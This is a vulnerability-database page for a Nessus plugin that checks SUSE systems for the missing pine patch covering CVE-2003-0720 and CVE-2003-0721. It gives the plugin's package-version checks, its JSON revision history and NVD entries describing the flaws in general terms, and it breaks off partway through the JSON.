Search...

SUSE-SA:2003:037: pine

2004-07-25T00:00:00

ID SUSE_SA_2003_037.NASL
Type nessus
Reporter Tenable
Modified 2016-12-27T00:00:00

Description

The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).

The well known and widely used mail client pine is vulnerable to a buffer overflow. The vulnerability exists in the code processing 'message/external-body' type messages. It allows remote attackers to execute arbitrary commands as the user running pine. Additionally an integer overflow in the MIME header parsing code has been fixed.

Since there is no workaround, an update is strongly recommended for pine users.

Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command 'rpm -Fhv file.rpm' to apply the update.

                                        
                                            #
# (C) Tenable Network Security, Inc.
#
# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:037
#


if ( ! defined_func("bn_random") ) exit(0);

include("compat.inc");

if(description)
{
 script_id(13805);
 script_version ("$Revision: 1.10 $");
 script_cve_id("CVE-2003-0720", "CVE-2003-0721");
 
 name["english"] = "SUSE-SA:2003:037: pine";
 
 script_name(english:name["english"]);
 
 script_set_attribute(attribute:"synopsis", value:
"The remote host is missing a vendor-supplied security patch" );
 script_set_attribute(attribute:"description", value:
"The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).


The well known and widely used mail client pine is vulnerable to
a buffer overflow.  The vulnerability exists in the code processing
'message/external-body' type messages. It allows remote attackers
to execute arbitrary commands as the user running pine.
Additionally an integer overflow in the MIME header parsing code
has been fixed.

Since there is no workaround, an update is strongly recommended for
pine users.

Please download the update package for your distribution and verify its
integrity by the methods listed in section 3) of this announcement.
Then, install the package using the command 'rpm -Fhv file.rpm' to apply
the update." );
 script_set_attribute(attribute:"solution", value:
"http://www.suse.de/security/2003_037_pine.html" );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");




 script_set_attribute(attribute:"plugin_publication_date", value: "2004/07/25");
  script_cvs_date("$Date: 2016/12/27 20:14:32 $");
 script_end_attributes();

 
 summary["english"] = "Check for the version of the pine package";
 script_summary(english:summary["english"]);
 
 script_category(ACT_GATHER_INFO);
 
 script_copyright(english:"This script is Copyright (C) 2004-2016 Tenable Network Security, Inc.");
 family["english"] = "SuSE Local Security Checks";
 script_family(english:family["english"]);
 
 script_dependencies("ssh_get_info.nasl");
 script_require_keys("Host/SuSE/rpm-list");
 exit(0);
}

include("rpm.inc");
if ( rpm_check( reference:"pine-4.33-279", release:"SUSE7.2") )
{
 security_hole(0);
 exit(0);
}
if ( rpm_check( reference:"pine-4.33-280", release:"SUSE7.3") )
{
 security_hole(0);
 exit(0);
}
if ( rpm_check( reference:"pine-4.44-281", release:"SUSE8.0") )
{
 security_hole(0);
 exit(0);
}
if ( rpm_check( reference:"pine-4.44-283", release:"SUSE8.1") )
{
 security_hole(0);
 exit(0);
}
if ( rpm_check( reference:"pine-4.53-109", release:"SUSE8.2") )
{
 security_hole(0);
 exit(0);
}
if (rpm_exists(rpm:"pine-", release:"SUSE7.2")
 || rpm_exists(rpm:"pine-", release:"SUSE7.3")
 || rpm_exists(rpm:"pine-", release:"SUSE8.0")
 || rpm_exists(rpm:"pine-", release:"SUSE8.1")
 || rpm_exists(rpm:"pine-", release:"SUSE8.2") )
{
 set_kb_item(name:"CVE-2003-0720", value:TRUE);
 set_kb_item(name:"CVE-2003-0721", value:TRUE);
}

JSON Vulners Source

Initial Source

{"id": "SUSE_SA_2003_037.NASL", "bulletinFamily": "scanner", "title": "SUSE-SA:2003:037: pine", "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to a buffer overflow. The vulnerability exists in the code processing 'message/external-body' type messages. It allows remote attackers to execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code has been fixed.\n\nSince there is no workaround, an update is strongly recommended for pine users.\n\nPlease download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply the update.", "published": "2004-07-25T00:00:00", "modified": "2016-12-27T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=13805", "reporter": "Tenable", "references": [], "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "type": "nessus", "lastseen": "2018-09-01T23:52:20", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to a buffer overflow. The vulnerability exists in the code processing 'message/external-body' type messages. It allows remote attackers to execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code has been fixed.\n\nSince there is no workaround, an update is strongly recommended for pine users.\n\nPlease download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply the update.", "edition": 1, "hash": "9b2da069b71c05db3ba0a70dcec2adec9c59acc38c724ed7bef781e3759e1f16", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "05016927b5a4665b1a236d162f96fde0", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3fbf46d5600fc392b51999ef09d807fc", "key": "description"}, {"hash": "2c14bc201ff403deced3aba2df959f24", "key": "cvss"}, {"hash": "b0bdac19c9acc5e82c8aa3b33f580e3d", "key": "sourceData"}, {"hash": "e71490137b17f3d1eb2e7298b2599a34", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "a4436c8edf8f7e256249e1fca5125120", "key": "title"}, {"hash": "66663704e9dd8be73768da8b89cdf6f7", "key": "published"}, {"hash": "86d2a785db55738b60ce9f8f5a94228a", "key": "cvelist"}, {"hash": "66663704e9dd8be73768da8b89cdf6f7", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=13805", "id": "SUSE_SA_2003_037.NASL", "lastseen": "2016-09-26T17:25:11", "modified": "2004-07-25T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "13805", "published": "2004-07-25T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:037\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13805);\n script_version (\"$Revision: 1.9 $\");\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n \n name[\"english\"] = \"SUSE-SA:2003:037: pine\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to\na buffer overflow. The vulnerability exists in the code processing\n'message/external-body' type messages. It allows remote attackers\nto execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code\nhas been fixed.\n\nSince there is no workaround, an update is strongly recommended for\npine users.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_037_pine.html\" );\n script_set_attribute(attribute:\"cvss_vector\", value: \"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the pine package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2010 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"pine-4.33-279\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.33-280\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-281\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-283\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.53-109\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"pine-\", release:\"SUSE7.2\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.2\") )\n{\n set_kb_item(name:\"CVE-2003-0720\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0721\", value:TRUE);\n}\n", "title": "SUSE-SA:2003:037: pine", "type": "nessus", "viewCount": 0}, "differentElements": ["modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:11"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to a buffer overflow. The vulnerability exists in the code processing 'message/external-body' type messages. It allows remote attackers to execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code has been fixed.\n\nSince there is no workaround, an update is strongly recommended for pine users.\n\nPlease download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply the update.", "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "e66866208efaf64dedd2d77f353787d1443f56e7c3c22d2554be5c1e3061819a", "hashmap": [{"hash": "05016927b5a4665b1a236d162f96fde0", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "77375b7e4fb559ca79ae2b35dd069f95", "key": "sourceData"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "3fbf46d5600fc392b51999ef09d807fc", "key": "description"}, {"hash": "e71490137b17f3d1eb2e7298b2599a34", "key": "pluginID"}, {"hash": "b017f8fd1f68bf1ce3326a29d49bf7f3", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "a4436c8edf8f7e256249e1fca5125120", "key": "title"}, {"hash": "66663704e9dd8be73768da8b89cdf6f7", "key": "published"}, {"hash": "86d2a785db55738b60ce9f8f5a94228a", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=13805", "id": "SUSE_SA_2003_037.NASL", "lastseen": "2016-12-28T06:11:56", "modified": "2016-12-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.2", "pluginID": "13805", "published": "2004-07-25T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:037\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13805);\n script_version (\"$Revision: 1.10 $\");\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n \n name[\"english\"] = \"SUSE-SA:2003:037: pine\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to\na buffer overflow. The vulnerability exists in the code processing\n'message/external-body' type messages. It allows remote attackers\nto execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code\nhas been fixed.\n\nSince there is no workaround, an update is strongly recommended for\npine users.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_037_pine.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"$Date: 2016/12/27 20:14:32 $\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the pine package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2016 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"pine-4.33-279\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.33-280\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-281\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-283\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.53-109\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"pine-\", release:\"SUSE7.2\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.2\") )\n{\n set_kb_item(name:\"CVE-2003-0720\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0721\", value:TRUE);\n}\n", "title": "SUSE-SA:2003:037: pine", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2016-12-28T06:11:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2003-0721", "CVE-2003-0720"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to a buffer overflow. The vulnerability exists in the code processing 'message/external-body' type messages. It allows remote attackers to execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code has been fixed.\n\nSince there is no workaround, an update is strongly recommended for pine users.\n\nPlease download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply the update.", "edition": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "f4411e597c453e83f61720944ae9f289bacd5ce81360c59f86dc0987938acde4", "hashmap": [{"hash": "05016927b5a4665b1a236d162f96fde0", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "77375b7e4fb559ca79ae2b35dd069f95", "key": "sourceData"}, {"hash": "3fbf46d5600fc392b51999ef09d807fc", "key": "description"}, {"hash": "e71490137b17f3d1eb2e7298b2599a34", "key": "pluginID"}, {"hash": "b017f8fd1f68bf1ce3326a29d49bf7f3", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "71a40666da62ba38d22539c8277870c7", "key": "naslFamily"}, {"hash": "a4436c8edf8f7e256249e1fca5125120", "key": "title"}, {"hash": "66663704e9dd8be73768da8b89cdf6f7", "key": "published"}, {"hash": "86d2a785db55738b60ce9f8f5a94228a", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=13805", "id": "SUSE_SA_2003_037.NASL", "lastseen": "2018-08-30T19:47:01", "modified": "2016-12-27T00:00:00", "naslFamily": "SuSE Local Security Checks", "objectVersion": "1.3", "pluginID": "13805", "published": "2004-07-25T00:00:00", "references": [], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:037\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13805);\n script_version (\"$Revision: 1.10 $\");\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n \n name[\"english\"] = \"SUSE-SA:2003:037: pine\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to\na buffer overflow. The vulnerability exists in the code processing\n'message/external-body' type messages. It allows remote attackers\nto execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code\nhas been fixed.\n\nSince there is no workaround, an update is strongly recommended for\npine users.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_037_pine.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"$Date: 2016/12/27 20:14:32 $\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the pine package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2016 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"pine-4.33-279\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.33-280\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-281\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-283\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.53-109\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"pine-\", release:\"SUSE7.2\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.2\") )\n{\n set_kb_item(name:\"CVE-2003-0720\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0721\", value:TRUE);\n}\n", "title": "SUSE-SA:2003:037: pine", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:47:01"}], "edition": 4, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvelist", "hash": "86d2a785db55738b60ce9f8f5a94228a"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "3fbf46d5600fc392b51999ef09d807fc"}, {"key": "href", "hash": "05016927b5a4665b1a236d162f96fde0"}, {"key": "modified", "hash": "b017f8fd1f68bf1ce3326a29d49bf7f3"}, {"key": "naslFamily", "hash": "71a40666da62ba38d22539c8277870c7"}, {"key": "pluginID", "hash": "e71490137b17f3d1eb2e7298b2599a34"}, {"key": "published", "hash": "66663704e9dd8be73768da8b89cdf6f7"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "9cf00d658b687f030ebe173a0528c567"}, {"key": "sourceData", "hash": "77375b7e4fb559ca79ae2b35dd069f95"}, {"key": "title", "hash": "a4436c8edf8f7e256249e1fca5125120"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "e66866208efaf64dedd2d77f353787d1443f56e7c3c22d2554be5c1e3061819a", "viewCount": 3, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2003:037\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(13805);\n script_version (\"$Revision: 1.10 $\");\n script_cve_id(\"CVE-2003-0720\", \"CVE-2003-0721\");\n \n name[\"english\"] = \"SUSE-SA:2003:037: pine\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2003:037 (pine).\n\n\nThe well known and widely used mail client pine is vulnerable to\na buffer overflow. The vulnerability exists in the code processing\n'message/external-body' type messages. It allows remote attackers\nto execute arbitrary commands as the user running pine.\nAdditionally an integer overflow in the MIME header parsing code\nhas been fixed.\n\nSince there is no workaround, an update is strongly recommended for\npine users.\n\nPlease download the update package for your distribution and verify its\nintegrity by the methods listed in section 3) of this announcement.\nThen, install the package using the command 'rpm -Fhv file.rpm' to apply\nthe update.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/2003_037_pine.html\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2004/07/25\");\n script_cvs_date(\"$Date: 2016/12/27 20:14:32 $\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the pine package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2004-2016 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"pine-4.33-279\", release:\"SUSE7.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.33-280\", release:\"SUSE7.3\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-281\", release:\"SUSE8.0\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.44-283\", release:\"SUSE8.1\") )\n{\n security_hole(0);\n exit(0);\n}\nif ( rpm_check( reference:\"pine-4.53-109\", release:\"SUSE8.2\") )\n{\n security_hole(0);\n exit(0);\n}\nif (rpm_exists(rpm:\"pine-\", release:\"SUSE7.2\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE7.3\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.0\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.1\")\n || rpm_exists(rpm:\"pine-\", release:\"SUSE8.2\") )\n{\n set_kb_item(name:\"CVE-2003-0720\", value:TRUE);\n set_kb_item(name:\"CVE-2003-0721\", value:TRUE);\n}\n", "naslFamily": "SuSE Local Security Checks", "pluginID": "13805", "cpe": []}

{"cve": [{"lastseen": "2018-05-06T20:30:09", "references": ["http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009850.html", "http://www.idefense.com/advisory/09.10.03.txt", "http://marc.info/?l=bugtraq&m=106329356702508&w=2", "http://www.redhat.com/support/errata/RHSA-2003-273.html", "http://marc.info/?l=bugtraq&m=106367213400313&w=2", "http://www.redhat.com/support/errata/RHSA-2003-274.html"], "description": "Integer signedness error in rfc2231_get_param from strings.c in PINE before 4.58 allows remote attackers to execute arbitrary code via an email that causes an out-of-bounds array access using a negative number.", "edition": 3, "reporter": "NVD", "published": "2003-09-17T00:00:00", "title": "CVE-2003-0721", "type": "cve", "enchantments": {"score": {"modified": "2018-05-06T20:30:09", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:503", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A503"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0721"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:503", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:503"}], "modified": "2018-05-02T21:29:22", "cpe": ["cpe:/a:university_of_washington:pine:4.53", "cpe:/a:university_of_washington:pine:4.21", "cpe:/a:university_of_washington:pine:4.56", "cpe:/a:university_of_washington:pine:4.0.2", "cpe:/a:university_of_washington:pine:3.98", "cpe:/a:university_of_washington:pine:4.0.4", "cpe:/a:university_of_washington:pine:4.20", "cpe:/a:university_of_washington:pine:4.52", "cpe:/a:university_of_washington:pine:4.44", "cpe:/a:university_of_washington:pine:4.30", "cpe:/a:university_of_washington:pine:4.10", "cpe:/a:university_of_washington:pine:4.33", "cpe:/a:university_of_washington:pine:4.50"], "id": "CVE-2003-0721", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0721", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-05-06T20:30:09", "references": ["http://www.idefense.com/advisory/09.10.03.txt", "http://archives.neohapsis.com/archives/vulnwatch/2003-q3/0099.html", "http://marc.info/?l=bugtraq&m=106329356702508&w=2", "http://www.redhat.com/support/errata/RHSA-2003-273.html", "http://marc.info/?l=bugtraq&m=106322571805153&w=2", "http://www.redhat.com/support/errata/RHSA-2003-274.html"], "description": "Buffer overflow in PINE before 4.58 allows remote attackers to execute arbitrary code via a malformed message/external-body MIME type.", "edition": 3, "reporter": "NVD", "published": "2003-09-17T00:00:00", "title": "CVE-2003-0720", "type": "cve", "enchantments": {"score": {"modified": "2018-05-06T20:30:09", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:499", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A499"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2003-0720"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:499", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:499"}], "modified": "2018-05-02T21:29:22", "cpe": ["cpe:/a:university_of_washington:pine:4.53", "cpe:/a:university_of_washington:pine:4.21", "cpe:/a:university_of_washington:pine:4.56", "cpe:/a:university_of_washington:pine:4.0.2", "cpe:/a:university_of_washington:pine:3.98", "cpe:/a:university_of_washington:pine:4.0.4", "cpe:/a:university_of_washington:pine:4.20", "cpe:/a:university_of_washington:pine:4.52", "cpe:/a:university_of_washington:pine:4.44", "cpe:/a:university_of_washington:pine:4.30", "cpe:/a:university_of_washington:pine:4.10", "cpe:/a:university_of_washington:pine:4.33", "cpe:/a:university_of_washington:pine:4.50"], "id": "CVE-2003-0720", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0720", "cvss": {"score": 7.5, "vector": 